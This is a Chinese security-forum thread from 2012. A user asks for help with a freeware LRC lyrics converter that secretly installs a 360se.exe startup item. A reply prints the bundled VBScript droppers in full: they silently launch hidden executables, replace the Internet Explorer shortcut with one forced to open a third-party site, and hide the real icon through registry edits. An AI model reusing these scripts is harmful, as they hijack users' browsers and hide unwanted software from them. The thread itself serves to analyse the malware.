-
-
[旧帖] [求助][求助] LRC歌词文件转换器 3.01 启动后自动生成360se.exe并自动启动 0.00雪花
-
发表于: 2012-3-3 13:38
-
下了个LRC歌词文件转换器 3.01,用了几次,也没有注意,后来打开任务管理器,出了个360se.exe的进程,我没有装360的东西,我想估计是出问题了,
找到开机 启动项,是个名称是 360se.exe文件,用pe 查下,显示为win32 dll,用0d打开,直接停在系统断点处,不知道,这个程序是做什么的,希望大家能分析下。
我估计这程序,有很多后门,说是免费软件,真不是好东西啊
找到开机 启动项,是个名称是 360se.exe文件,用pe 查下,显示为win32 dll,用0d打开,直接停在系统断点处,不知道,这个程序是做什么的,希望大家能分析下。
我估计这程序,有很多后门,说是免费软件,真不是好东西啊
|
|
|---|---|
|
|
如何启动的看看如下你就明白了
设置隐藏文件可见,你会发现..  a.vbs --------------------------------- DIM objShell set objShell=Wscript.createObject("wscript.shell") iReturn=objShell.Run("cmd.exe /C start dx.exe",0,TRUE) iReturn=objShell.Run("cmd.exe /C start 360SE.exe",0,TRUE) iReturn=objShell.Run("cmd.exe /C start b.vbs",0,TRUE) ----------------------------------- b.vbs ---------------------------------- On Error Resume Next Set Wshshell=CreateObject("Wscript.Shell") strLinkFile=WshShell.SpecialFolders("desktop")&"\Internet Explorer.*" Wshshell.Run "cmd /c attrib -s -h -r "&chr(34)&strLinkFile&chr(34),0,1 Wshshell.Run "cmd /c del /f/a/q "&chr(34)&strLinkFile&chr(34),0,1 strLinkFile=WshShell.SpecialFolders("desktop")&"\Internet Explorer.lnk" Set lnk=WshShell.CreateShortcut(strLinkFile) lnk.TargetPath =Chr(34)&"C:\Program Files\Internet Explorer\IEXPLORE.EXE"&Chr(34) lnk.Arguments="http://www.4442.cc" lnk.Description = " " lnk.Save Wshshell.Run "cmd /c attrib +r "&chr(34)&strLinkFile&chr(34),0,1 Wshshell.Run "cmd /C reg add "&chr(34)&"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel"&chr(34)&" /v {871C5380-42A0-1069-A2EA-08002B30309D} /t REG_DWORD /d 1 /F",0,1 Wshshell.Run "cmd /C reg add "&chr(34)&"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu"&chr(34)&" /v {871C5380-42A0-1069-A2EA-08002B30309D} /t REG_DWORD /d 1 /F",0,1 strDesktop = WSHShell.SpecialFolders("Desktop") WSHShell.AppActivate strDesktop WSHShell.SendKeys "{F5}" ----------------------------------------- |
|
|
怎么发图呀
  |
|
|
|
